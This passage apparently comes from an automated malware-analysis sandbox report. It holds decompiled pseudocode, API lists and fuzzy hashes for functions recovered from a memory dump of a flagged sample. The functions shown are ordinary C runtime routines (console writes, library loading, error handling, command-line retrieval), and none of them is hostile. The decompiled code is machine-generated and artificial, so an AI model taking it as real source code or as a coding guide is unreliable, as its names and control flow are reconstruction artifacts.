                • Opcode Fuzzy Hash: 4e2b16b33ddca4ab3ce0f4135b96e08b33a6f9acdfd16cac7d83fd7473779ac7
                • Instruction Fuzzy Hash: BA51D572B04216ABDB259F64CC41EAF77A9DB40760B15463EFC04F62C1DB38ED50CAA9
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 72%
                			E00408226(intOrPtr* _a4, signed int _a8, signed char* _a12, intOrPtr _a16) {
                				signed int _v8;
                				signed char _v15;
                				char _v16;
                				void _v24;
                				short _v28;
                				char _v31;
                				void _v32;
                				long _v36;
                				intOrPtr _v40;
                				void* _v44;
                				signed int _v48;
                				signed char* _v52;
                				long _v56;
                				int _v60;
                				void* __ebx;
                				signed int _t78;
                				signed int _t80;
                				int _t86;
                				void* _t93;
                				long _t96;
                				void _t104;
                				void* _t111;
                				signed int _t115;
                				signed int _t118;
                				signed char _t123;
                				signed char _t128;
                				intOrPtr _t129;
                				signed int _t131;
                				signed char* _t133;
                				intOrPtr* _t136;
                				signed int _t138;
                				void* _t139;
                
                				_t78 =  *0x412014; // 0xf1d94be9
                				_v8 = _t78 ^ _t138;
                				_t80 = _a8;
                				_t118 = _t80 >> 6;
                				_t115 = (_t80 & 0x0000003f) * 0x30;
                				_t133 = _a12;
                				_v52 = _t133;
                				_v48 = _t118;
                				_v44 =  *((intOrPtr*)( *((intOrPtr*)(0x4130a0 + _t118 * 4)) + _t115 + 0x18));
                				_v40 = _a16 + _t133;
                				_t86 = GetConsoleCP();
                				_t136 = _a4;
                				_v60 = _t86;
                				 *_t136 = 0;
                				 *((intOrPtr*)(_t136 + 4)) = 0;
                				 *((intOrPtr*)(_t136 + 8)) = 0;
                				while(_t133 < _v40) {
                					_v28 = 0;
                					_v31 =  *_t133;
                					_t129 =  *((intOrPtr*)(0x4130a0 + _v48 * 4));
                					_t123 =  *(_t129 + _t115 + 0x2d);
                					if((_t123 & 0x00000004) == 0) {
                						if(( *(E00405FC6(_t115, _t129) + ( *_t133 & 0x000000ff) * 2) & 0x00008000) == 0) {
                							_push(1);
                							_push(_t133);
                							goto L8;
                						} else {
                							if(_t133 >= _v40) {
                								_t131 = _v48;
                								 *((char*)( *((intOrPtr*)(0x4130a0 + _t131 * 4)) + _t115 + 0x2e)) =  *_t133;
                								 *( *((intOrPtr*)(0x4130a0 + _t131 * 4)) + _t115 + 0x2d) =  *( *((intOrPtr*)(0x4130a0 + _t131 * 4)) + _t115 + 0x2d) | 0x00000004;
                								 *((intOrPtr*)(_t136 + 4)) =  *((intOrPtr*)(_t136 + 4)) + 1;
                							} else {
                								_t111 = E00407222( &_v28, _t133, 2);
                								_t139 = _t139 + 0xc;
                								if(_t111 != 0xffffffff) {
                									_t133 =  &(_t133[1]);
                									goto L9;
                								}
                							}
                						}
                					} else {
                						_t128 = _t123 & 0x000000fb;
                						_v16 =  *((intOrPtr*)(_t129 + _t115 + 0x2e));
                						_push(2);
                						_v15 = _t128;
                						 *(_t129 + _t115 + 0x2d) = _t128;
                						_push( &_v16);
                						L8:
                						_push( &_v28);
                						_t93 = E00407222();
                						_t139 = _t139 + 0xc;
                						if(_t93 != 0xffffffff) {
                							L9:
                							_t133 =  &(_t133[1]);
                							_t96 = WideCharToMultiByte(_v60, 0,  &_v28, 1,  &_v24, 5, 0, 0);
                							_v56 = _t96;
                							if(_t96 != 0) {
                								if(WriteFile(_v44,  &_v24, _t96,  &_v36, 0) == 0) {
                									L19:
                									 *_t136 = GetLastError();
                								} else {
                									 *((intOrPtr*)(_t136 + 4)) =  *((intOrPtr*)(_t136 + 8)) - _v52 + _t133;
                									if(_v36 >= _v56) {
                										if(_v31 != 0xa) {
                											goto L16;
                										} else {
                											_t104 = 0xd;
                											_v32 = _t104;
                											if(WriteFile(_v44,  &_v32, 1,  &_v36, 0) == 0) {
                												goto L19;
                											} else {
                												if(_v36 >= 1) {
                													 *((intOrPtr*)(_t136 + 8)) =  *((intOrPtr*)(_t136 + 8)) + 1;
                													 *((intOrPtr*)(_t136 + 4)) =  *((intOrPtr*)(_t136 + 4)) + 1;
                													goto L16;
                												}
                											}
                										}
                									}
                								}
                							}
                						}
                					}
                					goto L20;
                					L16:
                				}
                				L20:
                				E004018CC();
                				return _t136;
                			}

                APIs
                • GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,0040899B,?,00000000,?,00000000,00000000), ref: 00408268
                • __fassign.LIBCMT ref: 004082E3
                • __fassign.LIBCMT ref: 004082FE
                • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 00408324
                • WriteFile.KERNEL32(?,?,00000000,0040899B,00000000,?,?,?,?,?,?,?,?,?,0040899B,?), ref: 00408343
                • WriteFile.KERNEL32(?,?,00000001,0040899B,00000000,?,?,?,?,?,?,?,?,?,0040899B,?), ref: 0040837C
                Memory Dump Source
                • Source File: 00000016.00000001.319216241.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000016.00000001.319250838.0000000000414000.00000040.00020000.sdmp
                Yara matches
                Similarity
                • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                • String ID:
                • API String ID: 1324828854-0
                • Opcode ID: faa740b07254e6310bf4514787e462a3298cd29c6bed95f9d4542f2984ff3bdb
                • Instruction ID: fe7485239ce71f502252f8dacad0a730230a626615d7e560becd3163b8212ce1
                • Opcode Fuzzy Hash: faa740b07254e6310bf4514787e462a3298cd29c6bed95f9d4542f2984ff3bdb
                • Instruction Fuzzy Hash: B551C070900209EFCB10CFA8D985AEEBBF4EF59300F14416EE995F3291EB359951CB68
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 27%
                			E00403632(void* __ecx, intOrPtr _a4) {
                				signed int _v8;
                				signed int _v12;
                				signed int _t10;
                				int _t12;
                				int _t18;
                				signed int _t20;
                
                				_t10 =  *0x412014; // 0xf1d94be9
                				_v8 = _t10 ^ _t20;
                				_v12 = _v12 & 0x00000000;
                				_t12 =  &_v12;
                				__imp__GetModuleHandleExW(0, L"mscoree.dll", _t12, __ecx, __ecx);
                				if(_t12 != 0) {
                					_t12 = GetProcAddress(_v12, "CorExitProcess");
                					_t18 = _t12;
                					if(_t18 != 0) {
                						E0040C15C();
                						_t12 =  *_t18(_a4);
                					}
                				}
                				if(_v12 != 0) {
                					_t12 = FreeLibrary(_v12);
                				}
                				E004018CC();
                				return _t12;
                			}

                APIs
                • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00403627,00000003,?,004035C7,00000003,00410EB8,0000000C,004036DA,00000003,00000002), ref: 00403652
                • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00403665
                • FreeLibrary.KERNEL32(00000000,?,?,?,00403627,00000003,?,004035C7,00000003,00410EB8,0000000C,004036DA,00000003,00000002,00000000), ref: 00403688
                Strings
                Memory Dump Source
                • Source File: 00000016.00000001.319216241.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000016.00000001.319250838.0000000000414000.00000040.00020000.sdmp
                Yara matches
                Similarity
                • API ID: AddressFreeHandleLibraryModuleProc
                • String ID: CorExitProcess$mscoree.dll
                • API String ID: 4061214504-1276376045
                • Opcode ID: cf427baca09bca2fe7784295da489c0a85b1d2c95ce850e6db67983e50b5df7d
                • Instruction ID: 2a5f1b52f49e2644cdc997ca28138b4c7ff7fe3d24fc8903f8dd75b8825c5772
                • Opcode Fuzzy Hash: cf427baca09bca2fe7784295da489c0a85b1d2c95ce850e6db67983e50b5df7d
                • Instruction Fuzzy Hash: D7F0A431A0020CFBDB109FA1DD49B9EBFB9EB04711F00427AF805B22A0DB754A40CA98
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 79%
                			E004062B8(void* __edx, void* __eflags, intOrPtr _a4, int _a8, char* _a12, int _a16, short* _a20, int _a24, intOrPtr _a28) {
                				signed int _v8;
                				int _v12;
                				char _v16;
                				intOrPtr _v24;
                				char _v28;
                				void* _v40;
                				void* __ebx;
                				void* __edi;
                				signed int _t34;
                				signed int _t40;
                				int _t45;
                				int _t52;
                				void* _t53;
                				void* _t55;
                				int _t57;
                				signed int _t63;
                				int _t67;
                				short* _t71;
                				signed int _t72;
                				short* _t73;
                
                				_t34 =  *0x412014; // 0xf1d94be9
                				_v8 = _t34 ^ _t72;
                				_push(_t53);
                				E00403F2B(_t53,  &_v28, __edx, _a4);
                				_t57 = _a24;
                				if(_t57 == 0) {
                					_t52 =  *(_v24 + 8);
                					_t57 = _t52;
                					_a24 = _t52;
                				}
                				_t67 = 0;
                				_t40 = MultiByteToWideChar(_t57, 1 + (0 | _a28 != 0x00000000) * 8, _a12, _a16, 0, 0);
                				_v12 = _t40;
                				if(_t40 == 0) {
                					L15:
                					if(_v16 != 0) {
                						 *(_v28 + 0x350) =  *(_v28 + 0x350) & 0xfffffffd;
                					}
                					E004018CC();
                					return _t67;
                				}
                				_t55 = _t40 + _t40;
                				_t17 = _t55 + 8; // 0x8
                				asm("sbb eax, eax");
                				if((_t17 & _t40) == 0) {
                					_t71 = 0;
                					L11:
                					if(_t71 != 0) {
                						E00402460(_t67, _t71, _t67, _t55);
                						_t45 = MultiByteToWideChar(_a24, 1, _a12, _a16, _t71, _v12);
                						if(_t45 != 0) {
                							_t67 = GetStringTypeW(_a8, _t71, _t45, _a20);
                						}
                					}
                					L14:
                					E004063D5(_t71);
                					goto L15;
                				}
                				_t20 = _t55 + 8; // 0x8
                				asm("sbb eax, eax");
                				_t47 = _t40 & _t20;
                				_t21 = _t55 + 8; // 0x8
                				_t63 = _t21;
                				if((_t40 & _t20) > 0x400) {
                					asm("sbb eax, eax");
                					_t71 = E00403E3D(_t63, _t47 & _t63);
                					if(_t71 == 0) {
                						goto L14;
                					}
                					 *_t71 = 0xdddd;
                					L9:
                					_t71 =  &(_t71[4]);
                					goto L11;
                				}
                				asm("sbb eax, eax");
                				E004018E0();
                				_t71 = _t73;
                				if(_t71 == 0) {
                					goto L14;
                				}
                				 *_t71 = 0xcccc;
                				goto L9;
                			}

                APIs
                • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000100,?,00000000,?,?,00000000), ref: 00406305
                • __alloca_probe_16.LIBCMT ref: 0040633D
                • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0040638E
                • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 004063A0
                • __freea.LIBCMT ref: 004063A9
                  • Part of subcall function 00403E3D: RtlAllocateHeap.NTDLL(00000000,?,00000004,?,00407C67,?,00000000,?,004067DA,?,00000004,?,?,?,?,00403B03), ref: 00403E6F
                Memory Dump Source
                • Source File: 00000016.00000001.319216241.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000016.00000001.319250838.0000000000414000.00000040.00020000.sdmp
                Yara matches
                Similarity
                • API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
                • String ID:
                • API String ID: 313313983-0
                • Opcode ID: adeb378ec079a85da5c13e5064e0c973eb82cbf5b51a7efbab845db40916055f
                • Instruction ID: a1348b344bfdb8beedea85c2379656fd8e164ea4191dcb9080565a587d22e55f
                • Opcode Fuzzy Hash: adeb378ec079a85da5c13e5064e0c973eb82cbf5b51a7efbab845db40916055f
                • Instruction Fuzzy Hash: AE31B072A0020AABDF249F65DC85DAF7BA5EF40310B05423EFC05E6290E739CD65DB94
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E00409BDD(void* __eflags, signed int _a4) {
                				intOrPtr _t13;
                				void* _t21;
                				signed int _t33;
                				long _t35;
                
                				_t33 = _a4;
                				if(E00405D6E(_t33) != 0xffffffff) {
                					_t13 =  *0x4130a0; // 0x587c30
                					if(_t33 != 1 || ( *(_t13 + 0x88) & 0x00000001) == 0) {
                						if(_t33 != 2 || ( *(_t13 + 0x58) & 0x00000001) == 0) {
                							goto L7;
                						} else {
                							goto L6;
                						}
                					} else {
                						L6:
                						_t21 = E00405D6E(2);
                						if(E00405D6E(1) == _t21) {
                							goto L1;
                						}
                						L7:
                						if(CloseHandle(E00405D6E(_t33)) != 0) {
                							goto L1;
                						}
                						_t35 = GetLastError();
                						L9:
                						E00405CDD(_t33);
                						 *((char*)( *((intOrPtr*)(0x4130a0 + (_t33 >> 6) * 4)) + 0x28 + (_t33 & 0x0000003f) * 0x30)) = 0;
                						if(_t35 == 0) {
                							return 0;
                						}
                						return E004047FB(_t35) | 0xffffffff;
                					}
                				}
                				L1:
                				_t35 = 0;
                				goto L9;
                			}

                APIs
                • CloseHandle.KERNEL32(00000000,00000000,?,?,00409AFB,?), ref: 00409C33
                • GetLastError.KERNEL32(?,00409AFB,?), ref: 00409C3D
                • __dosmaperr.LIBCMT ref: 00409C68
                Strings
                Memory Dump Source
                • Source File: 00000016.00000002.338373270.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                Yara matches
                Similarity
                • API ID: CloseErrorHandleLast__dosmaperr
                • String ID: 0|X
                • API String ID: 2583163307-1024512958
                • Opcode ID: f0f4e4d222caa73ee9a0f3d5fe9adb322dbc8770ca6fb4bd57fc01b4641c9a56
                • Instruction ID: 87f0d20415a4ba4edce453f192d75aa6f60acf784ef8f37888f2bef7d94c0d71
                • Opcode Fuzzy Hash: f0f4e4d222caa73ee9a0f3d5fe9adb322dbc8770ca6fb4bd57fc01b4641c9a56
                • Instruction Fuzzy Hash: 12014832A0815056E2242735A989B6F77C9DB82B34F28013FF809B72C3DE389C82919C
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 95%
                			E00405751(signed int _a4) {
                				signed int _t9;
                				void* _t13;
                				signed int _t15;
                				WCHAR* _t22;
                				signed int _t24;
                				signed int* _t25;
                				void* _t27;
                
                				_t9 = _a4;
                				_t25 = 0x412fc8 + _t9 * 4;
                				_t24 =  *_t25;
                				if(_t24 == 0) {
                					_t22 =  *(0x40cd48 + _t9 * 4);
                					_t27 = LoadLibraryExW(_t22, 0, 0x800);
                					if(_t27 != 0) {
                						L8:
                						 *_t25 = _t27;
                						if( *_t25 != 0) {
                							FreeLibrary(_t27);
                						}
                						_t13 = _t27;
                						L11:
                						return _t13;
                					}
                					_t15 = GetLastError();
                					if(_t15 != 0x57) {
                						_t27 = 0;
                					} else {
                						_t15 = LoadLibraryExW(_t22, _t27, _t27);
                						_t27 = _t15;
                					}
                					if(_t27 != 0) {
                						goto L8;
                					} else {
                						 *_t25 = _t15 | 0xffffffff;
                						_t13 = 0;
                						goto L11;
                					}
                				}
                				_t4 = _t24 + 1; // 0xf1d94bea
                				asm("sbb eax, eax");
                				return  ~_t4 & _t24;
                			}

                APIs
                • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000000,00000000,00000000,?,004056F8,00000000,00000000,00000000,00000000,?,004058F5,00000006,FlsSetValue), ref: 00405783
                • GetLastError.KERNEL32(?,004056F8,00000000,00000000,00000000,00000000,?,004058F5,00000006,FlsSetValue,0040D200,0040D208,00000000,00000364,?,004043F2), ref: 0040578F
                • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,004056F8,00000000,00000000,00000000,00000000,?,004058F5,00000006,FlsSetValue,0040D200,0040D208,00000000), ref: 0040579D
                Memory Dump Source
                • Source File: 00000016.00000001.319216241.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000016.00000001.319250838.0000000000414000.00000040.00020000.sdmp
                Yara matches
                Similarity
                • API ID: LibraryLoad$ErrorLast
                • String ID:
                • API String ID: 3177248105-0
                • Opcode ID: 179fc24cb71fa7b74b78db1aa8efd8080a6824dbe4e2c3e4e777693639d287a7
                • Instruction ID: a071a87d579bf16c10ed97f701b3afe57148fc5a73c01e838bdae708b7fec84a
                • Opcode Fuzzy Hash: 179fc24cb71fa7b74b78db1aa8efd8080a6824dbe4e2c3e4e777693639d287a7
                • Instruction Fuzzy Hash: 2001AC36612622DBD7214BA89D84E577BA8EF45B61F100635FA05F72C0D734D811DEE8
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 71%
                			E00404320(void* __ebx, void* __ecx, void* __edx) {
                				void* __edi;
                				void* __esi;
                				intOrPtr _t2;
                				void* _t3;
                				void* _t4;
                				intOrPtr _t9;
                				void* _t11;
                				void* _t20;
                				void* _t21;
                				void* _t23;
                				void* _t25;
                				void* _t27;
                				void* _t29;
                				void* _t31;
                				void* _t32;
                				long _t36;
                				long _t37;
                				void* _t40;
                
                				_t29 = __edx;
                				_t23 = __ecx;
                				_t20 = __ebx;
                				_t36 = GetLastError();
                				_t2 =  *0x412064; // 0xffffffff
                				_t42 = _t2 - 0xffffffff;
                				if(_t2 == 0xffffffff) {
                					L2:
                					_t3 = E00403ECE(_t23, 1, 0x364);
                					_t31 = _t3;
                					_pop(_t25);
                					if(_t31 != 0) {
                						_t4 = E004058CE(_t25, __eflags,  *0x412064, _t31);
                						__eflags = _t4;
                						if(_t4 != 0) {
                							E00404192(_t25, _t31, 0x4132a4);
                							E00403E03(0);
                							_t40 = _t40 + 0xc;
                							__eflags = _t31;
                							if(_t31 == 0) {
                								goto L9;
                							} else {
                								goto L8;
                							}
                						} else {
                							_push(_t31);
                							goto L4;
                						}
                					} else {
                						_push(_t3);
                						L4:
                						E00403E03();
                						_pop(_t25);
                						L9:
                						SetLastError(_t36);
                						E00403E8B(_t20, _t29, _t31, _t36);
                						asm("int3");
                						_push(_t20);
                						_push(_t36);
                						_push(_t31);
                						_t37 = GetLastError();
                						_t21 = 0;
                						_t9 =  *0x412064; // 0xffffffff
                						_t45 = _t9 - 0xffffffff;
                						if(_t9 == 0xffffffff) {
                							L12:
                							_t32 = E00403ECE(_t25, 1, 0x364);
                							_pop(_t27);
                							if(_t32 != 0) {
                								_t11 = E004058CE(_t27, __eflags,  *0x412064, _t32);
                								__eflags = _t11;
                								if(_t11 != 0) {
                									E00404192(_t27, _t32, 0x4132a4);
                									E00403E03(_t21);
                									__eflags = _t32;
                									if(_t32 != 0) {
                										goto L19;
                									} else {
                										goto L18;
                									}
                								} else {
                									_push(_t32);
                									goto L14;
                								}
                							} else {
                								_push(_t21);
                								L14:
                								E00403E03();
                								L18:
                								SetLastError(_t37);
                							}
                						} else {
                							_t32 = E00405878(_t25, _t45, _t9);
                							if(_t32 != 0) {
                								L19:
                								SetLastError(_t37);
                								_t21 = _t32;
                							} else {
                								goto L12;
                							}
                						}
                						return _t21;
                					}
                				} else {
                					_t31 = E00405878(_t23, _t42, _t2);
                					if(_t31 != 0) {
                						L8:
                						SetLastError(_t36);
                						return _t31;
                					} else {
                						goto L2;
                					}
                				}
                			}

                APIs
                • GetLastError.KERNEL32(?,?,004037D2,?,?,004016EA,00000000,?,00410E40), ref: 00404324
                • SetLastError.KERNEL32(00000000,?,?,004016EA,00000000,?,00410E40), ref: 0040438C
                • SetLastError.KERNEL32(00000000,?,?,004016EA,00000000,?,00410E40), ref: 00404398
                • _abort.LIBCMT ref: 0040439E
                Memory Dump Source
                • Source File: 00000016.00000001.319216241.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000016.00000001.319250838.0000000000414000.00000040.00020000.sdmp
                Yara matches
                Similarity
                • API ID: ErrorLast$_abort
                • String ID:
                • API String ID: 88804580-0
                • Opcode ID: 227254afb7dcebec3390116ce234b4a72ae62694c4cbaa731daa6ca1d097f5c4
                • Instruction ID: 10f1ed76ee289f7058500775698c1b2aead1ecf844b9f3100802fdeea25ad27f
                • Opcode Fuzzy Hash: 227254afb7dcebec3390116ce234b4a72ae62694c4cbaa731daa6ca1d097f5c4
                • Instruction Fuzzy Hash: 75F0A976204701A6C21237769D0AB6B2A1ACBC1766F25423BFF18B22D1EF3CCD42859D
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E004025BA() {
                				void* _t4;
                				void* _t8;
                
                				E00402AE5();
                				E00402A79();
                				if(E004027D9() != 0) {
                					_t4 = E0040278B(_t8, __eflags);
                					__eflags = _t4;
                					if(_t4 != 0) {
                						return 1;
                					} else {
                						E00402815();
                						goto L1;
                					}
                				} else {
                					L1:
                					return 0;
                				}
                			}

                APIs
                • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 004025BA
                • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 004025BF
                • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 004025C4
                  • Part of subcall function 004027D9: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 004027EA
                • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 004025D9
                Memory Dump Source
                • Source File: 00000016.00000001.319216241.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000016.00000001.319250838.0000000000414000.00000040.00020000.sdmp
                Yara matches
                Similarity
                • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
                • String ID:
                • API String ID: 1761009282-0
                • Opcode ID: 25f408f13cbe0c40dd9f497db491c4efe3e5092114ef2f2bbff8929357b925fc
                • Instruction ID: 4128bea016199bb2a2d03f508bec19fe8aa18f4adc422371eefe93b2158e2da6
                • Opcode Fuzzy Hash: 25f408f13cbe0c40dd9f497db491c4efe3e5092114ef2f2bbff8929357b925fc
                • Instruction Fuzzy Hash: E0C0024414014264DC6036B32F2E5AA235409A63CDBD458BBA951776C3ADFD044A553E
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E00405575() {
                
                				 *0x412e78 = GetCommandLineA();
                				 *0x412e7c = GetCommandLineW();
                				return 1;
                			}

                APIs
                Strings
                Memory Dump Source
                • Source File: 00000016.00000002.338373270.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                Yara matches
                Similarity
                • API ID: CommandLine
                • String ID: 3W
                • API String ID: 3253501508-3847566843
                • Opcode ID: 5876c0817ba34097e06c4a717b2c5bc39c627040ca7456eb6673a9cffb0a1105
                • Instruction ID: 265b5206e6e9c5440433cfe38bbdb56a7b23962a2c49d0f47ff6119da82ef27c
                • Opcode Fuzzy Hash: 5876c0817ba34097e06c4a717b2c5bc39c627040ca7456eb6673a9cffb0a1105
                • Instruction Fuzzy Hash: 24B09278800300CFD7008FB0BB8C0843BA0B2382023A09175D511D2320D6F40060DF4C
                Uniqueness

                Uniqueness Score: -1.00%